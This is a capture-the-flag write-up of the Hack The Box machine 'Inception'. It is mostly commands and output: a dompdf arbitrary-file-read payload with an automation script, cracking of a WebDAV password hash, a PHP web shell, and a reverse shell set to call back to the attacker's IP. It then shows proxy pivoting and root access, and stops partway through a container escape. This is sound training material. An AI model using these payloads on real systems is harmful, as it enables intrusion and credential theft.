Inception
Contents
Ports scan
u505@kali:~/HTB/Machines/Inception$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.67
Starting masscan 1.0.5 at 2020-05-27 18:29:31 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.67 Discovered open port 3128/tcp on 10.10.10.67
u505@kali:~/HTB/Machines/Inception$ nmap -sC -sV 10.10.10.67 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-27 14:29 EDT Nmap scan report for inception.htb (10.10.10.67) Host is up (0.039s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Inception 3128/tcp open http-proxy Squid http proxy 3.5.12 |_http-server-header: squid/3.5.12 |_http-title: ERROR: The requested URL could not be retrieved
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 46.29 seconds
Web Server
Dirsearch
u505@kali:~/HTB/Machines/Inception$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,js,html" -r 1 -f -t 1000 -u http://inception.htb/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, js, html | HTTP method: get | Threads: 1000 | Wordlist size: 18379 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-27_14-53-05.log
Target: http://inception.htb/
[14:53:05] Starting: [14:53:05] 403 - 293B - /.html [14:53:09] 200 - 1KB - /assets/ [14:53:22] 403 - 294B - /icons/ [14:53:22] 200 - 1KB - /images/ [14:53:23] 200 - 3KB - /index.html [14:53:25] 200 - 17KB - /LICENSE.txt [14:53:32] 200 - 2KB - /README.txt [14:53:33] 403 - 302B - /server-status/ [14:53:39] Starting: assets/ [14:53:40] 403 - 300B - /assets/.html [14:53:46] 200 - 2KB - /assets/css/ [14:53:49] 200 - 2KB - /assets/fonts/ [14:53:52] 200 - 1KB - /assets/js/ [14:54:06] Starting: icons/ [14:54:07] 403 - 299B - /icons/.html [14:54:34] 200 - 35KB - /icons/README.html [14:54:38] 403 - 300B - /icons/small/ [14:54:44] Starting: images/ [14:54:45] 403 - 300B - /images/.html [14:55:06] Starting: server-status/
Task Completed
Nothing of interrest.
u505@kali:~/HTB/Machines/Inception$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -e "txt,js,html" -f -t 1000 -u http://inception.htb/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, js, html | HTTP method: get | Threads: 1000 | Wordlist size: 326515
Error Log: /opt/utils/dirsearch/logs/errors-20-05-27_14-56-49.log
Target: http://inception.htb/
[14:56:49] Starting: [14:56:51] 200 - 1KB - /assets/ [14:56:51] 200 - 3KB - /index.html [14:57:07] 200 - 1KB - /images/ [14:57:07] 403 - 293B - /.html [14:57:22] 403 - 294B - /icons/
Task Completed
Extended dictionary doesn't show anything neither.
Folder dompdf
u505@kali:~/HTB/Machines/Inception$ curl http://inception.htb
<!DOCTYPE HTML>
<!--
Eventually by HTML5 UP
html5up.net | @ajlkn
Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
-->
<html>
<head>
<title>Inception</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<!--[if lte IE 8]><script src="assets/js/ie/html5shiv.js"></script><![endif]-->
<link rel="stylesheet" href="assets/css/main.css" />
<!--[if lte IE 8]><link rel="stylesheet" href="assets/css/ie8.css" /><![endif]-->
<!--[if lte IE 9]><link rel="stylesheet" href="assets/css/ie9.css" /><![endif]-->
</head>
<body>
<!-- Header -->
<header id="header">
<h1>Inception</h1>
<p>Dreams feel real while your in them right? <br />
Its only when you wake up when you realize they were actually strange. </p>
</header>
<!-- Signup Form -->
<form id="signup-form" method="post" action="#">
<input type="email" name="email" id="email" placeholder="Email Address" />
<input type="submit" value="Sign Up" />
</form>
<!-- Footer -->
<footer id="footer">
<ul class="icons">
<li><a href="#" class="icon fa-twitter"><span class="label">Twitter</span></a></li>
<li><a href="#" class="icon fa-instagram"><span class="label">Instagram</span></a></li>
<li><a href="#" class="icon fa-github"><span class="label">GitHub</span></a></li>
<li><a href="#" class="icon fa-envelope-o"><span class="label">Email</span></a></li>
</ul>
<ul class="copyright">
<li>© Inception, Inc.</li><li>Credits: Dominic Cobb</a></li>
</ul>
</footer>
<!-- Scripts -->
<!--[if lte IE 8]><script src="assets/js/ie/respond.min.js"></script><![endif]-->
<script src="assets/js/main.js"></script>
</body>
</html>
...
<!-- Todo: test dompdf on php 7.x -->
There is a comment at the end of the file, with an hint.
Arbitrary File read dompdf exploit
u505@kali:~/HTB/Machines/Inception$ searchsploit dompdf
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read | php/webapps/33004.txt
dompdf 0.6.0 beta1 - Remote File Inclusion | php/webapps/14851.txt
TYPO3 Extension ke DomPDF - Remote Code Execution | php/webapps/35443.txt
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
There is a Version file in the folder.
u505@kali:~/HTB/Machines/Inception$ curl http://10.10.10.67/dompdf/VERSION
0.6.0
This is the vulnerable version.
u505@kali:~/HTB/Machines/Inception$ searchsploit -m 33004
Exploit: dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read
URL: https://www.exploit-db.com/exploits/33004
Path: /usr/share/exploitdb/exploits/php/webapps/33004.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Inception/33004.txt
We try to exploit it following the example
u505@kali:~/HTB/Machines/Inception/enum$ curl http://inception.htb/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd -o etcpasswd.pdf
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2791 100 2791 0 0 29691 0 --:--:-- --:--:-- --:--:-- 29691
As expected, the generated pdf contains a base64 string.
u505@kali:~/HTB/Machines/Inception/enum$ pdftohtml -noframes etcpasswd.pdf u505@kali:~/HTB/Machines/Inception/enum$ html2text etcpasswd.html | sed '/^============/d' | base64 -d root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin cobb:x:1000:1000::/home/cobb:/bin/bash
The base64 string contains the /etc/passwd remote file, and we enumerate a first user cobb.
Exploit automation
To enumerate the host, we create a simple script to automate the decode process.
u505@kali:~/HTB/Machines/Inception$ cat readfiletarget.sh
#!/bin/bash
curl -s http://inception.htb/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=$1 | awk '/\[\(/ { print substr($0,index($0,"(")+1,index($0,")")-index($0,"(")-1);}' | base64 -d
curl extracts the file as pdf; awk extracts the base64 content and base64 decodes the payload.
u505@kali:~/HTB/Machines/Inception$ chmod +x readfiletarget.sh u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin cobb:x:1000:1000::/home/cobb:/bin/bash
This way is easier. ;)
Apache config
After a while looking into files accessible by www-data, there is an interesting information in apache configuration.
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
Alias /webdav_test_inception /var/www/html/webdav_test_inception
<Location /webdav_test_inception>
Options FollowSymLinks
DAV On
AuthType Basic
AuthName "webdav test credential"
AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
Require valid-user
</Location>
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
The WebDAV setup should allows us to upload files.
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /var/www/html/webdav_test_inception/webdav.passwd
webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
The apache hash and the user of the webdav.
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /var/www/html/webdav_test_inception/webdav.passwd > webdav.passwd
We retreive the auth file and analyze the hash.
u505@kali:~/HTB/Machines/Inception$ hashid '$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0' Analyzing '$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0' [+] MD5(APR) [+] Apache MD5
Brute force of the hash.
u505@kali:~/HTB/Machines/Inception$ hashcat -m 1600 --username webdav.passwd /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
...
u505@kali:~/HTB/Machines/Inception$ hashcat -m 1600 --username webdav.passwd /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0:babygurl69
Reverse shell
u505@kali:~/HTB/Machines/Inception/enum$ davtest -url http://inception.htb/webdav_test_inception -auth webdav_tester:babygurl69 ******************************************************** Testing DAV connection OPEN SUCCEED: http://inception.htb/webdav_test_inception ******************************************************** NOTE Random string for this session: zIoa0e1fdx ******************************************************** Creating directory MKCOL SUCCEED: Created http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx ******************************************************** Sending test files PUT txt SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.txt PUT aspx SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.aspx PUT shtml SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.shtml PUT php SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.php PUT pl SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.pl PUT asp SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.asp PUT jhtml SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.jhtml PUT jsp SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.jsp PUT html SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.html PUT cgi SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.cgi PUT cfm SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.cfm ******************************************************** Checking for test file execution EXEC txt SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.txt EXEC aspx FAIL EXEC shtml FAIL EXEC php SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.php EXEC pl FAIL EXEC asp FAIL EXEC jhtml FAIL EXEC jsp FAIL EXEC html SUCCEED: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.html EXEC cgi FAIL EXEC cfm FAIL
******************************************************** /usr/bin/davtest Summary: Created: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.txt PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.aspx PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.shtml PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.php PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.pl PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.asp PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.jhtml PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.jsp PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.html PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.cgi PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.cfm Executes: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.txt Executes: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.php Executes: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.html
The test shows us that we can upload php files, we generate a simple file.
u505@kali:~/HTB/Machines/Inception$ echo "<?php phpinfo() ?>" > u505.php
Upload of the phpinfo file.
u505@kali:~/HTB/Machines/Inception$ dave -u webdav_tester -p babygurl69 http://inception.htb/webdav_test_inception
dave -- DAV Explorer (v2.01) Try "help", or "open http://host.com/dav_enabled_dir/"
** Connected to http://inception.htb/webdav_test_inception/ ** dave> put u505.php put http://inception.htb/webdav_test_inception/u505.php (19 bytes) (success)
Setup of our reverse shell script.
u505@kali:~/HTB/Machines/Inception$ grep CHANGE php-reverse-shell.php $ip = '10.10.14.34'; // CHANGE THIS $port = 4444; // CHANGE THIS u505@kali:~/HTB/Machines/Inception$ mv php-reverse-shell.php reverse.php
And upload from the webdav command line console
dave> put reverse.php put http://inception.htb/webdav_test_inception/reverse.php (5493 bytes) (success)
Start the listener
u505@kali:~/HTB/Machines/Inception$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Call the reverse shell
u505@kali:~/HTB/Machines/Inception$ curl -v --user webdav_tester:babygurl69 http://inception.htb/webdav_test_inception/reverse.php
* Trying 10.10.10.67:80...
* TCP_NODELAY set
* Connected to inception.htb (10.10.10.67) port 80 (#0)
* Server auth using Basic with user 'webdav_tester'
> GET /webdav_test_inception/reverse.php HTTP/1.1
> Host: inception.htb
> Authorization: Basic d2ViZGF2X3Rlc3RlcjpiYWJ5Z3VybDY5
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 29 May 2020 02:08:02 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 94
< Content-Type: text/html; charset=UTF-8
<
WARNING: Failed to daemonise. This is quite common and not fatal.
Connection timed out (110)
* Connection #0 to host inception.htb left intact
And nothing! :(
Web shell
The reverse shell didn't work, so I tried with a simple web shell to figure out what is happening.
u505@kali:~/HTB/Machines/Inception$ cat cmd.php
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Upload the web shell.
dave> put cmd.php put http://inception.htb/webdav_test_inception/cmd.php (156 bytes) (success)
Network Recon
Try to ping our box, but packets are lost.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ping%20-c%201%2010.10.14.34
Checking the network config shows us that we are not on the target host but on another machine.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ifconfig
Listing the mounted file systems shows us, that we are inside a container.
http://inception.htb/webdav_test_inception/cmd.php?cmd=mount%20-l
The container is listening on port 80 (http, we are using it) port 22 (ssh), and 3128 (Squid proxy)
http://inception.htb/webdav_test_inception/cmd.php?cmd=netstat%20-nptul
The route table shows us the gateway is 192.168.0.1, possibly the target host.
http://inception.htb/webdav_test_inception/cmd.php?cmd=route%20-n
We ping the target "real" address 10.10.10.67
http://inception.htb/webdav_test_inception/cmd.php?cmd=ping%20-c%201%2010.10.10.67
But we don't ping the "real" host gateway 10.10.10.2, we can assume that the firewall is setup to avoid outgoing communication from the container.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ping%20-c%201%2010.10.10.2
Wordpress
There is a folder wordpress in the web root folder.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ls%20-l%20/var/www/html/
But when we try to access wordpress, it doesn't work.
But we spot the configuration file in the folder.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ls%20-l%20/var/www/html/wordpress_4.8.3
The file contains a password.
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /var/www/html/wordpress_4.8.3/wp-config.php | grep "DB_"
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'VwPddNh7xMZyDQoByQL4');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', );
Squid configuration
The squid config file is located in folder /etc/squid
http://inception.htb/webdav_test_inception/cmd.php?cmd=ls%20-l%20/etc/squid/
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /etc/squid/squid.conf | grep -v "^#" | grep -v "^$" acl localnet src 192.168.0.0/16 acl localnet_dst dst 192.168.0.0/16 acl localnet_dst dst 10.0.0.0/8 acl SSL_ports port 443 acl Safe_ports port 80 # http acl Safe_ports port 21 # ftp acl Safe_ports port 443 # https acl Safe_ports port 70 # gopher acl Safe_ports port 210 # wais acl Safe_ports port 1025-65535 # unregistered ports acl Safe_ports port 280 # http-mgmt acl Safe_ports port 488 # gss-http acl Safe_ports port 591 # filemaker acl Safe_ports port 777 # multiling http acl CONNECT method CONNECT http_access allow localhost manager http_access deny manager http_access deny localnet_dst http_access allow localnet http_access allow localhost http_access deny all http_port 3128 coredump_dir /var/spool/squid refresh_pattern ^ftp: 1440 20% 10080 refresh_pattern ^gopher: 1440 0% 1440 refresh_pattern -i (/cgi-bin/|\?) 0 0% 0 refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880 refresh_pattern . 0 20% 4320
The configuration allows squid to localhost and 192.168.0.0/16, but deny 10.0.0.0/8, that means that we can use squid to proxy to the container or the container network.
SSH container access
First we need to install connect proxy package.
u505@kali:~/HTB/Machines/Inception$ sudo apt install connect-proxy [sudo] password for u505: Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: connect-proxy 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 19.2 kB of archives. After this operation, 65.5 kB of additional disk space will be used. Get:1 http://kali.download/kali kali-rolling/main amd64 connect-proxy amd64 1.105-1+b1 [19.2 kB] Fetched 19.2 kB in 1s (16.3 kB/s) Selecting previously unselected package connect-proxy. (Reading database ... 534872 files and directories currently installed.) Preparing to unpack .../connect-proxy_1.105-1+b1_amd64.deb ... Unpacking connect-proxy (1.105-1+b1) ... Setting up connect-proxy (1.105-1+b1) ... Processing triggers for kali-menu (2020.2.2) ... Processing triggers for man-db (2.9.1-1) ...
We setup the ssh config file, to connect through the proxy the localhost, because the proxy is actually running on the container (the port 3128 is listening on the container). I assume that the host is NATting the connection to the container.
u505@kali:~/HTB/Machines/Inception$ cat ~/.ssh/config
Host inceptionproxy
ProxyCommand connect -H 10.10.10.67:3128 127.0.0.1 22
We connect with the user cobb, and we try the password that we found in the wordpreess file.
u505@kali:~/HTB/Machines/Inception$ ssh cobb@inceptionproxy The authenticity of host 'inceptionproxy (<no hostip for proxy command>)' can't be established. ECDSA key fingerprint is SHA256:dr5DOURssJH5i8VbjPxvbeM+e2FyMqJ8DGPB/Lcv1Mw. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'inceptionproxy' (ECDSA) to the list of known hosts. cobb@inceptionproxy's password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Last login: Thu Nov 30 20:06:16 2017 from 127.0.0.1 cobb@Inception:~$ whoami cobb
Alternative with proxychain
We add the proxy to proxychain configuration.
u505@kali:~/HTB/Machines/Inception$ sudo vi /etc/proxychains.conf
[sudo] password for u505:
u505@kali:~/HTB/Machines/Inception$ cat /etc/proxychains.conf | grep -v "^#" | grep -v "^$"
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
http 10.10.10.67 3128
Proxychains allows to execute commands through the proxy.
u505@kali:~/HTB/Machines/Inception$ proxychains ssh cobb@127.0.0.1 ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-10.10.10.67:3128-<><>-127.0.0.1:22-<><>-OK The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. ECDSA key fingerprint is SHA256:dr5DOURssJH5i8VbjPxvbeM+e2FyMqJ8DGPB/Lcv1Mw. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts. cobb@127.0.0.1's password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Last login: Fri May 29 03:34:28 2020 from 127.0.0.1 cobb@Inception:~$ whoami cobb
User Flag
cobb@Inception:~$ cat user.txt
<USER_FLAG>
cobb@Inception:~$ sudo -l
[sudo] password for cobb:
Matching Defaults entries for cobb on Inception:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User cobb may run the following commands on Inception:
(ALL : ALL) ALL
cobb@Inception:~$ sudo -i
root@Inception:~# whoami
root
root@Inception:~# cat root.txt
You're waiting for a train. A train that will take you far away. Wake up to find root.txt.
But the root flag is not here. We need to escape the container to access the host.
Escape container
root@Inception:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3e:28:53:63
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::216:3eff:fe28:5363/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:638408 errors:0 dropped:0 overruns:0 frame:0
TX packets:502836 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:167424212 (167.4 MB) TX bytes:247633581 (247.6 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:5771 errors:0 dropped:0 overruns:0 frame:0
TX packets:5771 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:1053385 (1.0 MB) TX bytes:1053385 (1.0 MB)
Our IP is 192.168.0.10.
root@Inception:~# netstat -nputl (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 216/sshd tcp6 0 0 :::80 :::* LISTEN 265/apache2 tcp6 0 0 :::22 :::* LISTEN 216/sshd tcp6 0 0 :::3128 :::* LISTEN 224/(squid-1) udp 0 0 0.0.0.0:48021 0.0.0.0:* 224/(squid-1) udp6 0 0 :::54226 :::* 224/(squid-1)
root@Inception:~# netstat -nput
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:22 127.0.0.1:39008 ESTABLISHED -
tcp 0 0 127.0.0.1:50166 127.0.0.1:22 ESTABLISHED 224/(squid-1)
tcp 0 0 127.0.0.1:22 127.0.0.1:50166 ESTABLISHED -
tcp 0 0 127.0.0.1:39008 127.0.0.1:22 ESTABLISHED 224/(squid-1)
tcp6 0 0 192.168.0.10:3128 192.168.0.1:42792 ESTABLISHED 224/(squid-1)
tcp6 0 476 192.168.0.10:3128 192.168.0.1:42812 ESTABLISHED 224/(squid-1)
udp6 0 0 ::1:47191 ::1:53654 ESTABLISHED -
udp6 0 0 ::1:53654 ::1:47191 ESTABLISHED 224/(squid-1)
The proxy connection is routed through the machine 192.168.0.1
root@Inception:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 eth0
192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
The gateway is 192.168.0.1, so it seems the host is on IP 192.168.0.1
Scan of Host ports
root@Inception:~# nmap -sC -sV 192.168.0.1 -bash: nmap: command not found
An alternative would be to download a static version of nmap (from https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap) and upload it through the WebDAV repository. But we can use nc to find open ports.
root@Inception:~# nc -z -v 192.168.0.1 1-65000 2>&1 | grep -v refused Connection to 192.168.0.1 21 port [tcp/ftp] succeeded! Connection to 192.168.0.1 22 port [tcp/ssh] succeeded! Connection to 192.168.0.1 53 port [tcp/domain] succeeded!
Scan of UDP ports
root@Inception:~# nc -zv -u 192.168.0.1 1-65535
Connection to 192.168.0.1 53 port [udp/domain] succeeded!
Connection to 192.168.0.1 67 port [udp/bootps] succeeded!
Connection to 192.168.0.1 69 port [udp/tftp] succeeded!
FTP, SSH and TFTP are open on the remote host.
Files download
